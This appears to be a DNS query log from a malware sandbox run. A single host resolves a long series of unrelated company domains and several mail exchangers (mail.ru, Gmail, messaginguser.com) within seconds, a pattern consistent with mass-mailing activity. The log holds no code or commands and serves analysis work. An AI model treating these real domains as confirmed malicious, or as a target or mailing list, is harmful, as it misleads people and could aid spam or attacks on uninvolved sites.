                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.793351889 CEST8.8.8.8192.168.2.60xaf51No error (0)rkengg.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.793351889 CEST8.8.8.8192.168.2.60xaf51No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.793351889 CEST8.8.8.8192.168.2.60xaf51No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.793351889 CEST8.8.8.8192.168.2.60xaf51No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.801031113 CEST8.8.8.8192.168.2.60xe2ffName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.822237015 CEST8.8.8.8192.168.2.60x4097Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.854101896 CEST8.8.8.8192.168.2.60x2e6bName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.908524036 CEST8.8.8.8192.168.2.60xfd3fNo error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.965487957 CEST8.8.8.8192.168.2.60x9972No error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.024324894 CEST8.8.8.8192.168.2.60xe6bbNo error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.037096024 CEST8.8.8.8192.168.2.60x8fe3No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.037096024 CEST8.8.8.8192.168.2.60x8fe3No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.038479090 CEST8.8.8.8192.168.2.60xe0feNo error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.080162048 CEST8.8.8.8192.168.2.60xedf6Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.107448101 CEST8.8.8.8192.168.2.60x3b81No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.125603914 CEST8.8.8.8192.168.2.60x3641No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.126391888 CEST8.8.8.8192.168.2.60xa7e9Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.130615950 CEST8.8.8.8192.168.2.60x91bcServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.188596010 CEST8.8.8.8192.168.2.60x3e9aNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.188596010 CEST8.8.8.8192.168.2.60x3e9aNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.206512928 CEST8.8.8.8192.168.2.60x7697Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.216330051 CEST8.8.8.8192.168.2.60x2cb2No error (0)hyab.se188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.216330051 CEST8.8.8.8192.168.2.60x2cb2No error (0)hyab.se188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.349735022 CEST8.8.8.8192.168.2.60xf1b4No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.382666111 CEST8.8.8.8192.168.2.60xc5c4No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.385425091 CEST8.8.8.8192.168.2.60x5bf6No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.385425091 CEST8.8.8.8192.168.2.60x5bf6No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.389930964 CEST8.8.8.8192.168.2.60x4c83No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.432554007 CEST8.8.8.8192.168.2.60x146bNo error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.432554007 CEST8.8.8.8192.168.2.60x146bNo error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.432554007 CEST8.8.8.8192.168.2.60x146bNo error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.432554007 CEST8.8.8.8192.168.2.60x146bNo error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.437968969 CEST8.8.8.8192.168.2.60x1520No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.489690065 CEST8.8.8.8192.168.2.60x7a11No error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.489690065 CEST8.8.8.8192.168.2.60x7a11No error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.517177105 CEST8.8.8.8192.168.2.60x5e15No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.599946022 CEST8.8.8.8192.168.2.60x4a2eServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.633975983 CEST8.8.8.8192.168.2.60x395cNo error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.638637066 CEST8.8.8.8192.168.2.60xfe79No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.640542030 CEST8.8.8.8192.168.2.60x5506No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.851461887 CEST8.8.8.8192.168.2.60xacc2No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.857655048 CEST8.8.8.8192.168.2.60xfc74No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.860932112 CEST8.8.8.8192.168.2.60xdba0Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.865151882 CEST8.8.8.8192.168.2.60xec44No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.906913042 CEST8.8.8.8192.168.2.60x31f2No error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.906913042 CEST8.8.8.8192.168.2.60x31f2No error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.113727093 CEST8.8.8.8192.168.2.60xd287No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.113727093 CEST8.8.8.8192.168.2.60xd287No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.119505882 CEST8.8.8.8192.168.2.60x5b38No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.119505882 CEST8.8.8.8192.168.2.60x5b38No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.136354923 CEST8.8.8.8192.168.2.60x8442No error (0)dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.136354923 CEST8.8.8.8192.168.2.60x8442No error (0)dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.159123898 CEST8.8.8.8192.168.2.60xe056No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.259186029 CEST8.8.8.8192.168.2.60x2364No error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.280852079 CEST8.8.8.8192.168.2.60x8e0bNo error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.293925047 CEST8.8.8.8192.168.2.60x6351No error (0)revoldia.net154.210.36.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.310503960 CEST8.8.8.8192.168.2.60x34dbServer failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.329701900 CEST8.8.8.8192.168.2.60xb2d4No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.345160961 CEST8.8.8.8192.168.2.60xc9a6Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.349253893 CEST8.8.8.8192.168.2.60x93eaNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.402442932 CEST8.8.8.8192.168.2.60x5174No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.402442932 CEST8.8.8.8192.168.2.60x5174No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.402442932 CEST8.8.8.8192.168.2.60x5174No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.402442932 CEST8.8.8.8192.168.2.60x5174No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.412117958 CEST8.8.8.8192.168.2.60x72dfNo error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.558260918 CEST8.8.8.8192.168.2.60x76acNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.579052925 CEST8.8.8.8192.168.2.60x9530No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.619909048 CEST8.8.8.8192.168.2.60x5baServer failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.724561930 CEST8.8.8.8192.168.2.60x6c71No error (0)envogen.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.724561930 CEST8.8.8.8192.168.2.60x6c71No error (0)envogen.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.727438927 CEST8.8.8.8192.168.2.60xd80eNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.727438927 CEST8.8.8.8192.168.2.60xd80eNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.728641987 CEST8.8.8.8192.168.2.60x6b54No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.728641987 CEST8.8.8.8192.168.2.60x6b54No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.728641987 CEST8.8.8.8192.168.2.60x6b54No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.804064989 CEST8.8.8.8192.168.2.60x5ec9No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.804064989 CEST8.8.8.8192.168.2.60x5ec9No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.804064989 CEST8.8.8.8192.168.2.60x5ec9No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.804064989 CEST8.8.8.8192.168.2.60x5ec9No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.824856043 CEST8.8.8.8192.168.2.60x1713No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.835937977 CEST8.8.8.8192.168.2.60x5c9bNo error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.845128059 CEST8.8.8.8192.168.2.60xc7d1No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.845128059 CEST8.8.8.8192.168.2.60xc7d1No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.846638918 CEST8.8.8.8192.168.2.60xd570No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.846638918 CEST8.8.8.8192.168.2.60xd570No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.846638918 CEST8.8.8.8192.168.2.60xd570No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.901360989 CEST8.8.8.8192.168.2.60x5643Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.929303885 CEST8.8.8.8192.168.2.60x7cc6No error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.929303885 CEST8.8.8.8192.168.2.60x7cc6No error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.943900108 CEST8.8.8.8192.168.2.60x52acNo error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.984519958 CEST8.8.8.8192.168.2.60x752aNo error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.006733894 CEST8.8.8.8192.168.2.60x96bcNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.006733894 CEST8.8.8.8192.168.2.60x96bcNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.059307098 CEST8.8.8.8192.168.2.60x2a41No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.089133978 CEST8.8.8.8192.168.2.60x89d4No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.246545076 CEST8.8.8.8192.168.2.60x7f4cNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.246545076 CEST8.8.8.8192.168.2.60x7f4cNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.362236977 CEST8.8.8.8192.168.2.60x76acServer failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.365252972 CEST8.8.8.8192.168.2.60x717fNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.365252972 CEST8.8.8.8192.168.2.60x717fNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.443269014 CEST8.8.8.8192.168.2.60x67dfNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.475836039 CEST8.8.8.8192.168.2.60x6f02No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.491328001 CEST8.8.8.8192.168.2.60x5eafServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.547401905 CEST8.8.8.8192.168.2.60x6f20No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.547401905 CEST8.8.8.8192.168.2.60x6f20No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.575563908 CEST8.8.8.8192.168.2.60x1c78No error (0)alt4.gmail-smtp-in.l.google.com173.194.202.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.595509052 CEST8.8.8.8192.168.2.60xa98dNo error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.610532045 CEST8.8.8.8192.168.2.60x90baNo error (0)gmail-smtp-in.l.google.com108.177.126.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.630352020 CEST8.8.8.8192.168.2.60x83aaNo error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.636229038 CEST8.8.8.8192.168.2.60xed42No error (0)websy.com34.98.99.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.648262024 CEST8.8.8.8192.168.2.60xe8b4No error (0)in1.smtp.messaginguser.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.648262024 CEST8.8.8.8192.168.2.60xe8b4No error (0)in1.smtp.messaginguser.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.648262024 CEST8.8.8.8192.168.2.60xe8b4No error (0)in1.smtp.messaginguser.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.648262024 CEST8.8.8.8192.168.2.60xe8b4No error (0)in1.smtp.messaginguser.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.648262024 CEST8.8.8.8192.168.2.60xe8b4No error (0)in1.smtp.messaginguser.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.648262024 CEST8.8.8.8192.168.2.60xe8b4No error (0)in1.smtp.messaginguser.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.652781963 CEST8.8.8.8192.168.2.60x2c01No error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.652781963 CEST8.8.8.8192.168.2.60x2c01No error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.678267002 CEST8.8.8.8192.168.2.60xac79Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.732083082 CEST8.8.8.8192.168.2.60xf10dNo error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.754353046 CEST8.8.8.8192.168.2.60x940aNo error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.786241055 CEST8.8.8.8192.168.2.60x8218Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.961450100 CEST8.8.8.8192.168.2.60x147No error (0)revoldia.net154.210.36.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.973079920 CEST8.8.8.8192.168.2.60x1c54Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.975492954 CEST8.8.8.8192.168.2.60xac5No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.021775961 CEST8.8.8.8192.168.2.60xbc7cNo error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.033535957 CEST8.8.8.8192.168.2.60x1d49No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.099889994 CEST8.8.8.8192.168.2.60x29ecNo error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.099889994 CEST8.8.8.8192.168.2.60x29ecNo error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.099889994 CEST8.8.8.8192.168.2.60x29ecNo error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.126821041 CEST8.8.8.8192.168.2.60x1b6aNo error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.365298033 CEST8.8.8.8192.168.2.60x76acServer failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.417253971 CEST8.8.8.8192.168.2.60x49f0No error (0)cutchie.com199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.425431013 CEST8.8.8.8192.168.2.60x3eecNo error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.454370975 CEST8.8.8.8192.168.2.60x6e7No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.496242046 CEST8.8.8.8192.168.2.60xe458No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.510442019 CEST8.8.8.8192.168.2.60xb867No error (0)pcoyuncu.com134.119.176.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.536669016 CEST8.8.8.8192.168.2.60x713bNo error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.542613029 CEST8.8.8.8192.168.2.60xa3aNo error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.583591938 CEST8.8.8.8192.168.2.60x3e22No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.780076981 CEST8.8.8.8192.168.2.60xb10fNo error (0)shesfit.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.780076981 CEST8.8.8.8192.168.2.60xb10fNo error (0)shesfit.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.821948051 CEST8.8.8.8192.168.2.60xbbf4No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.238112926 CEST8.8.8.8192.168.2.60x7108No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.345599890 CEST8.8.8.8192.168.2.60xe260No error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.373405933 CEST8.8.8.8192.168.2.60x1e36No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.416227102 CEST8.8.8.8192.168.2.60x76acServer failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.422148943 CEST8.8.8.8192.168.2.60xb090No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.607161999 CEST8.8.8.8192.168.2.60x69dcNo error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.680411100 CEST8.8.8.8192.168.2.60xfaafNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.680411100 CEST8.8.8.8192.168.2.60xfaafNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.680411100 CEST8.8.8.8192.168.2.60xfaafNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.680411100 CEST8.8.8.8192.168.2.60xfaafNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.796124935 CEST8.8.8.8192.168.2.60xed56No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.892357111 CEST8.8.8.8192.168.2.60xf500No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.892357111 CEST8.8.8.8192.168.2.60xf500No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.928045034 CEST8.8.8.8192.168.2.60x5882No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.994632959 CEST8.8.8.8192.168.2.60x2f3eName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.022810936 CEST8.8.8.8192.168.2.60x1cc6Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.050998926 CEST8.8.8.8192.168.2.60xf552No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
